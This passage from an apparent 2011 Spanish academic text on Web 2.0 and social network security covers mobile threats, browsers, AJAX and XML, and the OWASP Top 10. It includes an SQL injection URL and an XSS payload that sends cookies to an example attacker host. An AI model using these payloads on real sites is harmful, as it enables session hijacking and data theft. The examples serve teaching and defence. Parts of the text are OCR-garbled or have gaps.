El hecho de que existan tantos sistemas operativos abre el abanico de posibilidades en cuanto
vulnerabilidades detectadas y posibles ataques, que podrían abrir nuevos agujeros de
seguridad permitiendo la ejecución de código arbitrario o denegaciones de servicio.
Otro problema de seguridad podría ser el uso que se hace del teléfono interna y
externamente. Si los dispositivos se reciclan en la empresa, habrá que incorporar sistemas de
borrado de datos y backup para evitar fugas de información dentro y fuera de la empresa.
Las vulnerabilidades también pueden venir de la mano de los navegadores, que no dejan de
ser otra aplicación más.
Página 154
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
El sistema operativo con más virus en octubre de 2010 fue el más utilizado, es decir, Symbian
que presentaba un total de 463 familias del malware revirtiéndose la situación a favor de
Android e IOS.
Página 155
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Hablando de Bluetooth también hemos visto muchos ataques de Bluespam, que básicamente
se trata de que un dispositivo móvil tiene siempre el Bluetooth activado en modo
descubrimiento el que nos lleguen mensajes arbitrarios creados por el atacante, pero esta
vulnerabilidad es más un problema del usuario que de seguridad.
Troyanos (Android)
El primer virus detectado para Android fue Trojan-SMS. La aplicación FakePlayer.a se trata de
una falsa aplicación para reproducir contenido multimedia. Se pide que el usuario del teléfono
instale un archivo vía SMS que instala un troyano que comienza a mandar mensajes de texto
sin que el usuario lo sepa.
La instalación de aplicaciones con creador desconocido tiene mucho riesgo sobre todo para
sistemas operativos como Android, Symbian o BlackBerry.
Uno de ellos fue un fallo de seguridad en el manejo de esquemas de direcciones por parte del
navegador. Esto permite la realización de llamadas telefónicas mostrando un simple aviso al
pinchar en un enlace, y los que es peor, si se tiene instalado Skype, el aviso no se hará.
Página 156
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Realice una copia de seguridad de los datos del dispositivo. Esto permitirá tener a
salvo los datos de agenda, fotos, videos, documentos almacenados, descargas
realizadas y otros, a fin de restaurarlos en caso de que el teléfono sea infectado u
ocurra algún incidente de pérdida de información.
Active las conexiones por bluetooth, infrarrojos y WiFi sólo cuando vaya a utilizarlas,
de forma que no se conviertan en puertas de acceso para posibles atacantes. Si el
modelo lo permite, establezca contraseñas para el acceso al dispositivo a través de
estas conexiones.
Asegúrese siempre de que los equipos a los que es conectado el dispositivo estén
limpios y no transmitirán archivos infectados al móvil.
Descargue aplicaciones sólo desde sitios de confianza o tiendas oficiales (como por
ejemplo Apple Store para iPhone). Las mismas deben estar siempre certificadas por
los fabricantes.
Desconecte siempre los servicios Web que requieran contraseña antes de cerrar el
navegador Web.
Mediante estos trucos conseguiremos que el teléfono móvil esté más protegido y con él la
información contenida en él.
46
“Seguridad para dispositivos móviles” por ESET.
Fuente: Lambdasi, argentina http://www.lambdasi.com.ar/textocomp.asp?id=919
Página 157
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Tal es la inseguridad que se esta generando en los teléfonos móviles inteligentes que ya han
salido varios paquetes de antivirus en el mercado para este tipo de dispositivos.
Este antivirus permite salvaguardar la privacidad de los usuarios de teléfonos móviles. Incluye
características de cifrado mejorado, privacidad de contactos o características de antirrobo.
47
Fuente: lista proveída por AboutLineTips.com, http://www.aboutonlinetips.com/free-antivirus-for-mobile-or-smartphones/
Página 158
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
11.3.4. Navegadores
Recordemos que los navegadores juegan un papel esencial en la parte del cliente ya que son
estos los que principalmente se encargan de permitir el acceso a los sitios web 2.0 y redes
sociales en la mayoría de los casos. Los principales navegadores que encontramos hoy día en
Internet son Internet Explorer, Firefox, Chrome, Safari y Opera.
Si vemos la evolución que han tenido los principales navegadores de hoy en día, vemos que
Internet Explorer sigue siendo el gran ganador seguido de Firefox y que Chrome a pesar de su
poca vida está el tercero en la cola superando ya a sus compañeros Safari y Opera.
Vamos a ver datos de los porcentajes de uso de los navegadores de agosto de 2010 que nos
ofrece la Web http://gs.statcounter.com/.
Página 159
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Si vemos el desglose por versiones y comparamos, podemos ver cómo tanto Firefox como
Chrome han ganado una gran cuota de mercado.
Ilustración 45. Comparación de cuota de uso de navegadores por versiones (Jun 09 – Jul 11).
Aunque Chrome y Firefox van ganando cuota de mercado, Internet Explorer sigue siendo el
gran ganador.
Todos estos navegadores cada día más personalizables, incluyen extensiones o gadgets para
configurar nuestras redes sociales.
No vamos a explicar que hace cada navegador ya que todos ellos al fin y al cabo son muy
parecidos visualmente, tienen una interfaz muy similar, vamos a ver una navegador que ha
sido creado para las redes sociales, Flock.
Página 160
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
11.3.4.1. Flock
Flock se trata de un navegador desarrollado por Mozilla y está enfocado hacia el uso de las
redes sociales y Webs 2.0.
Integra la creación de redes y servicios como Facebook, YouTube, Twitter, Flickr, Blogger,
GMail, Yahoo Mail y otros. Cuenta con herramientas para el uso de blogs, feeds de RSS y
ATOM, páginas favoritas de Del.icio.us y compartir fotos mediante Flick.
Página 161
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
El navegador incluye una barra lateral donde podemos ver todas las actualizaciones de
nuestras redes sociales y Web 2.0 y una página de inicio con nuestra cuenta personal para
poder añadir favoritos y más características.
El navegador Web ha sido galardonado con varios premios como Premio Open Web, Premio
Weeby o Premio de la comunidad SXSW, entre otros.
Página 162
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 12
Lenguajes y Tecnologías de
comunicación entre cliente y
servidor
12.1. Introducción
Con el nacimiento de la WWW en 1990 empezaron a surgir lenguajes y protocolos de
hipertexto como HTTP, URI o HTML. También surgieron los primero navegadores, como
Mosaic en 1993 y todo esto como objetivo del intercambio científico. Tras el estallido de la
burbuja tecnológica, finalmente en 2005 nació lo que llamamos hoy día Web 2.0, un
entramado de lenguajes, tecnologías, protocolos unido a las redes sociales.
Página 163
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
12.2.1. AJAX
AJAX (Asynchronous JavaScript And XML)es una es una tecnología que combina JavaScript
asíncrono y XML para crear aplicaciones interactivas o RIA (Rich Internet Applications).
Esta tecnología está siendo tan extendida en el mundo de la Web 2.0 que muchas veces la
gente oye hablar de ella y no sabe de qué se trata, ni dónde buscar información de ella. El
éxito de AJAX se basa en que no se trata de una simple tecnología, sino de la unión de las
mejores tecnologías, que son capaces de conseguir cosas fascinantes como GoogleMaps.
Google ha realizado una gran inversión en esta tecnología, muchos de sus productos como
Orkut, Gmail, Google Groups, Google Suggest o Google Maps son aplicaciones AJAX. Otras
webs tienen integradas partes del motor AJAX como algunas funciones de Flickr o el motor de
búsqueda de Amazon.
El concepto de AJAX es mantener cargando y renderizando una página Web mientras script y
rutinas se comunican con el servidor en background, en búsqueda de datos que se van usando
para actualizar la página, todo esto mostrando y ocultando partes de la página.
AJAX incorpora (del artículo “Ajax: A New Approach to WebApplications” de Jesse James
Garrett obtenido de http://adaptivepath.com/ideas/essays/archives/000385.php):
Página 164
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Ilustración 48. Comparación modelo clásico Web y AJAX por Jesse James.
48
“AJAX un nuevo acercamiento a Aplicaciones Web” por Jesse James.
Página 165
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
En el siguiente gráfico49 podemos ver la diferencia del motor de procesamiento de los dos
modelos:
~ ~;¡;'
c: c:
jg jg
",.
~' ..
J3
" ~ ..
"
B
, ~
, ,
system processing system processing
server
:E~ '"61 :~
"- "- "- "-
~
~
:§ 61 '"61 .-§
t ¡me q'
E q'
~
q'
E q'
~
E
'" ~ ~ '" ~ ~
~;¡;' ~ ~~' ~ ~¡¡;' ~ ~¡¡;' ~
~ ~ ~ ~
~ ~ ~
~
~
" ...
"'7,' "
~ ~. "
server-5rde server-slde server-slde server-5lde
processing processing processi ng processing
erver
Jesse James Garrett I adaptivepath,com
Ilustración 49. Comparación del modelo síncrono clásico y asíncrono del motor de AJAX por Jesse James.
49
“AJAX un nuevo acercamiento a Aplicaciones Web” por Jesse James.
Página 166
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
GoogleMaps fue una de las primeras aplicaciones que utilizó tecnología AJAX. Ofrece de
forma gratuita una API para poder desarrollar aplicaciones basadas en los mapas que ofrece
Google. El motor de AJAX permite que la interacción entre la aplicación y el usuario ocurra de
manera asíncrona, es decir, que el usuario no tendrá que ver la típica pantalla en blanco o el
reloj de arena, si no que va viendo progresivamente como ser carga la web de manera casi
instantánea como por en GoogleMaps.
AJAX es muy dinámico, atractivo y funcional a la hora de programar este tipo de webs, es por
esto que una gran mayoría de portales 2.0 han elegido esta tecnología para desarrollarla.
Página 167
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
12.2.2. HTML
HTML de las siglas Hypertex Markup Language (Lenguaje de Marcado de Hipertexto), es el
lenguaje de marcado para hipertexto que predomina en las páginas webs.
<html>
<head>
<title>Titulo</title>
</head>
<body>
<h1>Titulo1</h1>
<p>Veamos un enlace la <a
href=http://www.uc3m.es>Universidad Carlos III</a>
</p>
</body>
</html>
Sus primeras versiones usaban sintaxis SGML (Standard Generalized Markup Language) que se
trataba de un lenguaje de marcado genérico.
Página 168
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
12.2.3. CSS
CSS de las siglas Cascading Style Sheets (Hojas de estilo en cascada). Describen como se
muestra un documento escrito en HTML o XML.
<link rel=‖stylesheet‖
href=‖ejemplo.css‖
type=‖ejemplo/css‖ />
_____________________________
Body { background : yellow; }
h1 { text-align : center; }
Vemos que está definiendo que el color de fondo del cuerpo va ser amarillo, y que el nivel de
escritura h1 estará centrado y esto será para todos los documentos que incluyan esta hoja de
estilo.
Es mucho más fácil hacer un control del estilo de una Web completa de manera
centralizada, y no hoja por hoja, lo que sería mucho más tedioso.
Las hojas de estilo se pueden crear en local para aplicarlas algún sitio Web, lo que
permite la accesibilidad.
Se pueden elegir diferentes hojas de estilo según el cliente final es decir si es un
navegador, un dispositivo móvil, iPhone, etc. y finalmente al separar el estilo en
CSS del documento en HTML o XML seremos capaces de leer con más facilidad el
documento.
Por último, al tener todo el estilo de la Web concentrado en las hojas de estilo,
disminuiremos de manera considerable el volumen del archivo de los documentos
finales.
Página 169
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
12.2.4. XML
XML, de las siglas eXtensile Markup Language (Lenguaje de Marcado Extensible). Este
metalenguaje se desarrolló por el W3C (World Wide Web Consortium).
Tiene el mismo objetivo que SGML (Standard Generalized Markup Language) pero pensado
para Web, es más restrictivo que SGML, pero más sencillo. Ha adquirido un gran éxito como
lenguaje de intercambio.
XML es una familia de tecnologías, un conjunto creciente de módulos que ofrecen servicios
útiles a las demandas de los usuarios.
Los beneficios que tenemos con XML frente a HTML en un entorno de Web 2.0 son muchos. El
lenguaje XML es un lenguaje muy similar al HTML ya que usa etiquetas (<Ejemplo>) y
atributos (de la forma nombre=‖valor‖) de la misma forma, pero HTML no indica lo que
está representando, sin embargo, XML describe el contenido de las etiquetas, describe los
datos.
Página 170
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
XML utiliza las etiquetas sólo para delimitar las piezas de datos y se deja la interpretación de
los datos completamente a quién los lee. Sin embargo HTML especifica lo que cada etiqueta y
atributo significan.
XML es texto que en principio no está pensado para que el usuario final lo lea, pero si en un
momento determinado lo necesita lo puede hacer. Las reglas de XML son más estrictas que
HTML, ya que en HTML si olvidamos un atributo o unas comillas no tienen por qué haber
grandes problemas, pero en XML puede inutilizar el documento por completo. Quizá esta sea
la mayor ventaja de HTML frente a XML.
El tener que etiquetar todo exhaustivamente en XML hace que sus documentos tengan mayor
tamaño que los documento de HTML, pero hoy en día, con las grandes capacidades de
transferencia y almacenamiento que manejamos, ¿qué puede suponer “mega arriba o mega
abajo”? Los protocolos de comunicación HTTP/1.1 son capaces de comprimir datos al vuelo,
ahorrando ancho de banda significativamente.
Finalmente podemos destacar otras ventajas de XML, como que es gratuito, independiente
de la plataforma y actualmente está bien soportado.
Podemos ver el siguiente titulado “Web 2.0 ... The Machine is Us/ing Us” creado por Michal
Wesch, profesor de la Universidad de Kansas.
Nos muestra como los lenguajes como XML, que se encargan de separar el contenido del
diseño, están adaptados a los nuevos entornos Web 2.0, la Web 2.0 que básicamente la
formamos nosotros mismos.
Página 171
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
12.2.5. XHTML
XHTML de las siglas eXtensible Hypertext Markup Language (Lenguaje de Marcado de
Hipertexto Extensible). XHTML 1.0 es la adaptación de HTML 4.0 al lenguaje XML por la W3C,
podemos ver la especificación oficial de XHTML en http://www.w3.org/TR/xhtml1/.
XHTML combina la sintaxis de HTML, para mostrar datos, con la sintaxis de XML, para
describir los datos. Es una versión más estricta de HTML que tiene la intención de reemplazar
este lenguaje. Es más estricta ya que XHTML tiene que estar bien formado y todas las
etiquetas deben tener su principio y fin, es decir, un poco más cercano al XML en este sentido.
De hecho la gran mayoría de los textos HTML están mal formados y no hay problema. El W3C
nos ofrece la posibilidad de validarlos y ver los posibles errores http://validator.w3.org/.
E objetivo de este lenguaje es una vez más separar claramente la forma del contenido.
Esta separación permite que los contenidos y presentación de los documentos XHTML sean
más flexibles adaptándose mejor a las pantallas de los ordenadores, pantallas de los
dispositivos móviles, etc. De hecho el lenguaje XHTML surge al llegar al mercado una gran
variedad de dispositivos que soportan páginas Web como teléfonos móviles, PDAs,
BlackBerrys, Iphone, etc.
Las ventajas del XHTML frente al HTML son varias. A medida que van proliferando las
herramientas XML como por ejemplo XSLT para transformar documentos, vamos viendo
estas ventajas en aumento. Las aplicaciones de Web Semántica serán capaces de sacar
provecho de los documentos XHTML, y con Web Semántica nos referimos a la evolución de la
Web hacia la Web 3.0.
Otra ventaja es que XHTML puede incluir otros lenguajes como MathML (Mathematical
Markup Language), SMIL (Synchronized Multimedia Integration Language) o SVG (Scalable
Vector Graphics), al contrario que HTML.
Página 172
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
50
ECMAScript se trata de una especificación de lenguaje de programación publicada por ECMA
Internacional (Organización internacional para estándares de comunicación y información). Estuvo
basado su desarrollo en el lenguaje JavaScript.
Página 173
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
RSS fue el primero formato de fuente web y sigue siendo el más popular, tal es así que
erróneamente el término RSS es usado para referirse a fuente Web. RSS es el formato y
fuente Web es el medio de redifusión de contenido Web.
Se trata de una tecnología, una familia de formatos de fuentes Web codificados en XML, para
el envío automatizado de titulares de noticias a los programas lectores o agregadores. La
ventaja que tiene RSS es que no necesita de un navegador sino de un software que sea capaz
de leer contenidos RSS, es decir el agregador. Los agregadores son lectores de fuentes Web
que obtienen resúmenes de todos los sitios que se linkeen, desde el escritorio del sistema
operativo, correo electrónico o aplicaciones que funcionan a través de Web; las más
conocidas:
Google Reader
MyYahoo!
Netvibes
iGoogle
Los archivos de RSS llamados feeds RSS o canales RSS contienen un breve resumen de la
publicación en el sitio Web de origen. Cada publicación consta de un título, un resumen de
texto y un enlace al documento original. También tenemos otra información adicional como
autor, fecha de publicación, etc.
Veamos este ejemplo gráfico que se trata de un feed RSS del blog Estimulate de Blogger,
feed://web20sec.blogspot.com.
51
RDF de las siglas Resource Description Framework, es un framework para metadatos en la WWW
desarrollado por W3C
Página 174
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Como hemos visto al principio existen diferentes versiones de RSS. Las primeras versiones
fueron desarrolladas por Netscape, la 0.9 y la 0.91. La versión 1.0 se creó por un grupo
independiente en el formato RDF y la versión 2.0 la desarrolló finalmente UserLand Software,
empresa que adoptó la tecnología de Netscape.
RDF (Resource Description Framework) es un formato de texto XML que soporta aplicaciones
de descripción de recursos y metadatos como música, fotos, etc. RDF podría identificar las
personas en un álbum de fotos web usando información de una lista de contactos personales
permitiendo que el cliente de correo informe a esas personas que sus fotos están en la web.
Crear feeds RSS es muy sencillo ya que se generan automáticamente gracias a las
herramientas de publicación de la mayoría de sitios Web, reescribiéndose conforme
actualizamos la Web. Si utilizamos programas como MovableType o Blogger tendremos la
opción de generar automáticamente un feed de RSS.
Página 175
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
En las páginas webs existen aplicaciones desarrolladas en lenguajes diferentes que requieren
el intercambio de datos y lo hacen mediante servicios web. Estos servicios proporcionan un
mecanismo de comunicación estándar para poder permitir interactuar a las aplicaciones entre
sí y presentar la información de manera dinámica al usuario.
Para que esto funcione necesitamos una arquitectura de referencia estándar. Las
organizaciones OASIS (Organization for the Advancement of Structured Information Standards)
y W3C se encargan de esta arquitectura.
Estándares
Página 176
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
La representación de los mensajes se hace mediante SOAP (Simple Object Access Protocol).
Envelope
Header (meta-información)
Body (datos en formato XML)
Fault (errores)
WSDL describe los servicios Web: ¿Qué hace el servicio? ¿Dónde reside? ¿Cómo se invoca?
Página 177
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Ventajas e Inconvenientes
Ventajas
Inconvenientes
SOAP vs REST
Las ventajas de REST es que es ligero (no es necesario demasiado XML para la configuración),
da resultados legibles y es bastante fácil de implementar.
Las ventajas que presenta SOAP es que es fácil de consumir, es rígido (es fuertemente tipado)
y que existen herramientas de desarrollo.
Parece que SOAP está ganando la batalla a REST: Aunque la arquitectura de REST sea más
antigua, no cabe duda que funciona sin problemas y es bastante rápido y eficaces por lo que se
podría decir, que aunque algo más arcaicas, esto hace a su vez que también sean algo más
fiables.
Página 178
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 179
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
12.4.1. Introducción
Hace unos años cuando solo existía la Web 1.0, la seguridad Web giraba en torno a la
seguridad de los propios servidores Web en aquellos momentos. No existían las aplicaciones
para Web y teníamos un modelo de Web completamente estático basado exclusivamente en
HTML.
Hoy en día el escenario es diferente; hemos evolucionado hacia una Web 2.0 donde las
personas están completamente intercomunicadas. Una web que dispone de múltiples
aplicaciones, donde se manejan gran cantidad de lenguajes y tecnologías y que hay que
estandarizar para que se comuniquen correctamente estos lenguajes y tecnologías y evitar así
que no haya ningún agujero de seguridad, lo que es una tarea bastante complicada.
El gran problema de la seguridad 2.0, es que se tenía que haber previsto en su momento. Los
lenguajes y tecnologías evolucionaron con la Web 2.0, pero la seguridad va un paso por
detrás, por lo que nos encontramos en algunos casos con graves problemas de seguridad.
Si a todos estos problemas que conllevan las tecnologías en sí, la definición de protocolos, etc.
los unimos a que existen también graves problemas de privacidad y múltiples ataques de
ingeniería social (phishing, spam, robo de contraseñas…), ataques debidos al desconocimiento
de la población, una población que no está concienciada, podemos englobar un gran agujero
de seguridad en la Web 2.0.
Una de las listas más interesantes y famosas de ataques Web 2.0 es la “Top 10 Web 2.0 Attack
Vectors” realizada por Shreeraj Shah. Podemos descargarla de InfosecWriters,
http://www.infosecwriters.com/texts.php?op=display&id=518.
Los principales ataques vienen de la mano de los Servicios Web que van más enfocados al lado
del servidor, las tecnologías AJAX y cliente RIA (Rich Internet Application) que mejoran la
interfaz en el lado del cliente. El lenguaje XML está presente tanto en la interfaz como en la
capa de transporte (HTTP/HTTPS), sustituyendo casi al HTML clásico. Actualmente se está
hablando mucho del HTML5, un “nuevo” lenguaje que engloba muchas de las tecnologías
actualmente vigentes.
Página 180
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Existía un gusano llamado Yamanner que explotaba las oportunidades de XSS en la llamada
de AJAX de Yahoo mail. Otro gusano también conocido llamado Samy explotaba las
vulnerabilidades de XSS de MySpace.
2. Envenenamiento XML
La gran mayoría de Webs 2.0 y aplicaciones 2.0 tratan datos en XML entre cliente y servidor.
Las aplicaciones Web consumen bloques de XML que provienen de clientes AJAX.
Existe la posibilidad de crear bloques de XML malformado, como ocurre con el SQL en el
ataque Cross-site Scripting. En ocasiones se aplica una técnica recursiva cargando nodos
similares de XML muchas veces. Si se usa esta técnica y se envía este código mal formado al
servidor de manera intencionada y múltiples veces, se podría llegar a generar una Denegación
de Servicios (DoS).
Existen dos tipos de mecanismos de análisis de la sintaxis de XML en el lado del servidor que
son SAX y DOM.
SAX o “Simple API for XML” es una api para usar XML en JAVA principalmente y
para otros lenguajes de programación.
DOM o “Document Object Model” es una API que proporciona un conjunto de
objetos para representar documentos HTML o XML.
Este ataque también se vale de los servicios web para consumir mensajes SOAP (Simple
Object Access Protocol), que en definitiva son mensajes XML. La función básica de SOAP es
definir un formato de mensaje estándar (basado en XML) que encapsula la comunicación
entre aplicaciones.
A gran escala la adaptación de XML en la capa de aplicación abre nuevas oportunidades para
usar ésta como nuevo vector de ataque. Si permitimos que existan referencia externas de
nuestro código XML podría ser manipulado por un atacante. Esto podría provocar la inyección
de código malicioso o aperturas de conexiones TCP pudiendo ser aprovechadas por un
atacante.
El envenenamiento del esquema XML es otro vector de ataque que podría cambiar el flujo de
ejecución. Esta vulnerabilidad pude ayudar al atacante a obtener información confidencial
comprometida.
Para corregir esta vulnerabilidad, todo el código XML que llegue a nuestro servidor deberá ser
valorado previamente.
Página 181
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Esta vulnerabilidad consiste en inyectar código de JavaScript en RSS o Atom para que sea
ejecutado por el navegador en el lado del cliente. Todos los navegadores hoy en día son
capaces de mostrar feeds de RSS o Atom. El usuario final visita el sitio Web que cargará un
script malicioso que podría contener una secuencia de comandos que pueden instalar
malware o secuestrar cookies de sesión.
Éstos deberían validar el contenido de la aplicación antes de enviarla al cliente para evitar la
ejecución de código arbitrario. Con RSS y Atom los feeds se convierten en la parte integrante
de las aplicaciones Web, es importante filtrar determinados caracteres en el lado del servidor
antes de enviarlos al usuario final.
Los atacantes podrán encontrar mucha información observado lo que se publica en nuestros
servicios web. Deberíamos proporcionar acceso limitado a nuestros WSDLs o proteger el
archivo.
Página 182
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Las validaciones del cliente deberían siempre estar respaldadas por las validaciones del
servidor y no dejar la validación solo a cargo de las rutinas de AJAX.
Es posible superar las validaciones basadas en AJAX y hacer POST o peticiones GET
directamente a la aplicación pudiéndose producir ataques de inyección de SQL, inyección
LDAP, etc. que podría comprometer el Website y los recursos clave de la aplicación.
Este nuevo vector de ataque expande las vulnerabilidades de ataque mediante AJAX.
WS-Routing permite enviar mensajes SOAP que viajen en una secuencia específica de varios
nodos diferentes en Internet. Determinados mensajes cifrados atraviesan estos nodos. Si un
nodo de ese camino se ve comprometido, el mensaje SOAP también lo estará.
Esto podría suponer una violación grave de la seguridad para los mensajes SOAP.
Se podrían crear mensajes SOAP malformados que intenten realizar inyecciones de tipo SQL,
XPATH, LDAP o comandos del sistema.
Las capacidades de análisis de XPATH están soportadas por muchos idiomas. Las aplicaciones
web consumen grandes documentos de XML y en muchas ocasiones las aplicaciones toman la
Página 183
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
aportación del usuario final y las declaraciones en forma XPATH. Estas secciones de código
son vulnerables a inyección XPATH. Si la inyección XPATH se realiza con éxito, un atacante
puede pasar por alto los mecanismos de autenticación o causar pérdida de información
confidencial.
Hay pocos defectos conocidos de XPATH que se pueden aprovechar por un atacante. La única
manera de bloquear este vector de ataque es proporcionando la validación de entrada
correcta antes de pasar valores a una declaración de XPATH.
Página 184
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Se trata de un proyecto de código abierto sin tener ningún tipo de asociación corporativa, lo
que lo hace bastante flexible a la hora de exponer información. Se podría decir que su página
web es como la Wikipedia de la seguridad web.
El documento que nos interesa a nosotros es el “OWASP Top 10 Web Application Security
Risks”, que trata las 10 vulnerabilidades más explotadas actualmente en aplicaciones vía Web.
- 1. Técnicas de inyección.
- 2. Cross-site Scripting (XSS).
- 3. Pérdida de autenticación y gestión de sesiones.
- 4. Referencia indirecta insegura a objetos.
- 5. Cross-site Request Forgery (CSRF).
- 6. Configuración errónea de la seguridad.
- 7. Almacenamiento criptográfico inseguro.
- 8. Fallo de restricción de acceso por URL.
- 9. Protección insuficiente de la capa de transporte
- 10. Redirecciones y reenvíos no validados.
Todos estos ataques se producen de manera frecuente en los websites de Internet. Vamos a
analizar y ver en qué consiste cada uno de ellos.
Página 185
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
1. TÉCNICAS DE INYECCIÓN
Las técnicas de inyección afectan principalmente a código SQL, comandos del sistema
operativo o inyección LDAP o Lightweight Directory Acess Protocol (Protocolo Ligero de
Acceso a Directorios).
Estas técnicas de inyección son parecidas a las de cross-sitescripting que veremos más
adelante, pero estás tratan de inyectar código SQL directamente en la parte del servidor,
también en muchas ocasiones se realiza la inyección mediante formularios. Se envían datos al
servidor que éste no valida de manera adecuada y se produce la inyección normalmente a
través de consultas SQL. El atacante manipula los datos de la entrada para forzar al intérprete
a ejecutar consultas para extraer, modificar o eliminar registros de la base de datos.
Escenario
a. Atacante: Cualquier persona externa o interna, incluso administradores que puedan enviar
datos no confiables al sistema.
b. Ataque: El atacante envía texto simple basado en la sintaxis del intérprete, explotando una
vulnerabilidad del sistema. Casi cualquier fuente de datos puede ser un objetivo de inyección,
incluidas fuentes internas de datos. Existen una infinidad de foros 53 con ejemplos de
inyecciones de SQL básicos y que en muchos casos increíblemente funcionan.
52
Los datos no confiables provienen del término inglés “untrusted data”. Este término es utilizado exclusivamente en el ámbito
de la seguridad informática para referirse a una fuente de información desconocida, que podría ser potencialmente dañina para el
sistema.
53
Elhacker.net, ejemplos de inyecciones SQL comunes,
http://foro.elhacker.net/tutoriales_documentacion/tutorial_de_inyeccion_sql_sql_injection-t98448.0.html.
Página 186
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
d. Impacto técnico: Este ataque puede producir la pérdida de datos, corrupción de los datos o
denegación de acceso. En ocasiones el ataque puede llevar a tomar el control completo del
servidor web o base de datos atacados.
e. Impacto del negocio: Dependerá del valor de los datos afectados y la ejecución del
intérprete. Todos los datos podrían ser robados, modificados o incluso eliminados. La
reputación de la empresa podría ser dañada también.
Podemos chequear el código para ver si la aplicación hace uso de los intérpretes de manera
segura. Las herramientas de análisis de código nos pueden ayudar a realizar un análisis de la
seguridad de los intérpretes y rastrear el flujo de datos de la aplicación. También podemos
realizar test de penetración para observar las vulnerabilidades que tenemos y poder
corregirlas.
Escáneres dinámicos automatizados del sistema nos pueden ayudar a ver si existen
vulnerabilidades y son explotables por la inyección de código. Pero los escáneres no son
fiables 100%, en ocasiones no pueden llegar a los intérpretes por lo que nos tenemos que
apoyar en otras herramientas.
Página 187
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
http://miPFCweb20.es/app/accountView?nombreDeUsuario=' or '1'='1
En el peor de los casos, el atacante usa esta vulnerabilidad para invocar procedimiento
especiales almacenados en la base de datos que permiten hacerse con el control de la base de
datos y posiblemente incluso del servidor que aloja la base de datos.
Página 188
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Esta vulnerabilidad ocurre cuando una aplicación toma datos no confiables y los envía a un
navegador Web sin necesidad de validación adecuada. El cross-site scripting permite a los
atacantes ejecutar scripts en el navegador de la víctima, que puede secuestrar sesiones de
usuario, desconfigurar un sitio Web o redirigir al usuario a Websites maliciosos (podría
realizarse de esta manera un ataque de phising).
Se trata de un tipo de inyección HTML, se produce cuando una aplicación toma datos que
introduce el usuario y los envía al navegador sin validarlos o codificarlos. Normalmente esto se
realiza mediante formularios en páginas Web o post de foros, donde se presupone que el
usuario va a introducir en los campos los datos con el formato adecuado. Si estos campos no
se validan podemos ser capaces de introducir código malicioso de manera no muy difícil, por
ejemplo, mediante tecnologías como JavaScript.
Escenario
a. Atacante: Cualquier persona externa o interna, incluso administradores que puedan enviar
datos no confiables a la Web.
b. Ataque: El atacante enviará datos codificados de determinada manera a una web que el
interpreté no validará pudiendo así acceder al sistema. Es fácil de detectar este tipo de
ataques si se examina el código.
- Almacenados.
- Reflejados.
- DOM o Document Object Model (Modelo de Objetos de Documento) basados en XSS.
La detención de la mayoría de fallos de XSS es bastante sencilla a través de test o analizando
el código fuente.
Página 189
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
e. Impacto del negocio: El impacto dependerá del valor de los datos afectados y de los datos
procesados. Podría dañar la reputación de la empresa.
Aquí tendremos un problema y es que en cada aplicación Web se genera páginas de salida de
manera diferente y se utilizan diferentes intérpretes del lado del cliente como JavaScript,
ActiveX, Flash o Silverlight, que hace difícil la detención automatizada. Por lo tanto, la
cobertura total requiere una combinación de revisión de código manualmente y realizar test
de acceso a la bases de datos o de acceso a la Web mediante formularios, de manera manual
también.
Las tecnologías Web 2.0 como AJAX, hacen que el Cross-site Scripting sea más difícil de
detectar a través de herramientas automatizadas.
'><script>document.location='http://miPFCweb20.es/atacante/cgi-
bin/cookie.cgi?foo='+document.cookie</script>'.
Esto permite modificar el periodo de identificación de sesión de la victima para ser enviado a
la Web del atacante, permitiendo secuestrar la sesión actual del usuario. Estos ataque pueden
usar Cross-site Scripting y también para acabar con cualquier defensa CSRF o Cross-site
Request Forgery, que pudiera emplear la aplicación. Posteriormente hablaremos más en
profundidad de CSRF.
Página 190
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Escenario
a. Atacante: Atacantes externos y usuarios con sus propias cuentas, que pueden intentar
robar las cuentas de otros usuarios.
d. Impacto técnico: Las vulnerabilidades podrán autorizar algunas cuentas para que puedan
atacar. Una vez que esto ocurra, el atacante puede hacer cualquier cosa que la victima pudiera
hacer, es decir, que dependerá de los privilegios asignados a esa cuenta. Las cuentas con
privilegios son blancos frecuentes.
e. Impacto del negocio: Dependerá del valor de los datos afectados y de los datos
procesados. Podría dañar la reputación de la empresa.
Página 191
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
¿Soy vulnerable?
